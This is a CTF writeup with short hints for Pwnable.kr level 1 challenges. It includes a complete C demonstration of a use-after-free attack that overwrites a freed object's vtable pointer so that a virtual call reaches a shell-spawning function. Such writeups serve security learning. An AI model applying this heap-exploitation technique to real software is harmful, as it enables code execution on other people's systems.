Pwnable.kr Level 1 Writeup
Last updated: Mar. 23, 2017 23:47:23 CST
Just some notes. Took about 24 hours in total.
The admin said that writeups of the other levels should not be shared... But that doesn't affect me yet, since I haven't done them yet ;).
Just use perl
Note that the padding should be 52, not 32. And your terminal emulator might do bad things...
RCE. So easy. Unpack manually and break at memcpy.
How to override fflush()?
Try to learn something about rand() and srand()...
Complex. But just try... Kind of boring.
You need to see how ARM fetches instructions. Interesting!
Time to print a C operator precedence table and paste it on your laptop.
Just normal things. Nothing to mention about it.
Good practice for the algorithm.
Another example of a wrong type.
cmd1 and cmd2
Many solutions are using PATH. But I love vim.
Block size is 0x18 bytes, so we need to free and then get two 18-byte blocks via the second option, which means the previous two blocks can be written. We can write a fake vtable address and modify the function pointer.
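As an added illustration of the pattern in the note above (this is example code, not the level's binary or the author's solution), the following C program models a polymorphic object whose first word is its vtable pointer, frees it, reclaims the 0x18-byte chunk with a same-size allocation carrying attacker bytes, and then dispatches through the dangling pointer. The fake vtable value used here (the real table's address minus one slot, so that the program's call to slot 1 lands on slot 0) is this example's own choice, and the names give_shell, introduce, "Jack" and 25 are illustrative. It relies on glibc's LIFO reuse of a just-freed small chunk; if the allocator does not hand the chunk back, it returns -1 without touching the dangling pointer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Hand-rolled "C++ object": the first word is the vtable pointer, exactly as
 * g++ lays out a class with virtual methods. sizeof(struct human) == 0x18. */
struct human {
    void (*const *vtable)(struct human *);
    int age;
    const char *name;
};

static int shell_spawned = 0;   /* set when the hijacked slot runs */
static int introduced    = 0;   /* set when the intended slot runs */

static void give_shell(struct human *h) { (void)h; shell_spawned = 1; }
static void introduce(struct human *h)  { (void)h; introduced = 1; }

/* Real vtable: slot 0 = give_shell, slot 1 = introduce.
 * The program only ever calls slot 1 on the object. */
static void (*const human_vtable[2])(struct human *) = { give_shell, introduce };

/* Returns 1 if the freed chunk was reused and the fake vtable redirected the
 * slot-1 call to give_shell, 0 if the chunk was reused but the hijack failed,
 * and -1 if malloc did not return the same chunk (dangling pointer untouched). */
int uaf_demo(void)
{
    struct human *h = malloc(sizeof *h);        /* 0x18-byte request */
    h->vtable = human_vtable;
    h->age = 25;                                /* illustrative values */
    h->name = "Jack";

    /* volatile copy: keeps the compiler from reasoning about the dangling use */
    struct human *volatile dangling = h;
    uintptr_t old_addr = (uintptr_t)h;

    free(h);                                    /* ... but dangling is used later */

    /* Attacker-controlled allocation of the same size (the note's "second
     * option"): the first 8 bytes of the payload land on the vtable pointer.
     * Pointing one slot before the real table makes index 1 hit give_shell. */
    void (*const *fake_vtable)(struct human *) =
        (void (*const *)(struct human *))((uintptr_t)human_vtable - sizeof(void *));
    unsigned char payload[0x18];
    memset(payload, 'A', sizeof payload);
    memcpy(payload, &fake_vtable, sizeof fake_vtable);

    unsigned char *buf = malloc(sizeof payload);
    if ((uintptr_t)buf != old_addr) {           /* chunk not recycled: bail out */
        free(buf);
        return -1;
    }
    memcpy(buf, payload, sizeof payload);

    /* The program's normal call: vtable[1](obj), i.e. introduce().
     * With the pointer shifted back by one slot it resolves to give_shell. */
    dangling->vtable[1](dangling);

    free(buf);
    return (shell_spawned && !introduced) ? 1 : 0;
}

int main(void)
{
    int r = uaf_demo();
    printf("uaf_demo() = %d (%s)\n", r,
           r == 1 ? "vtable hijacked" : r == 0 ? "no hijack" : "chunk not reused");
    return r == 1 ? 0 : 1;
}
```

The reuse check is what separates a demonstration from a crash: in the real level the first payload is also what the second allocation overwrites, so both reads must carry the fake pointer, as the note says.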
At least two available solutions:
- Write a debugger snippet to check parameters and return values of malloc
- Use "Heap Analyzer" in Visual Studio
If you get a SIGSEGV, it might be caused by unaligned memory. Try to solve it. Note that the management structure also takes some space.
Simple. Learn to use pwntools.
Looks like ptmalloc unlink. But the site admin's solution is interesting.
FROM: blog.iret.xyz | Author: blog.iret.xyz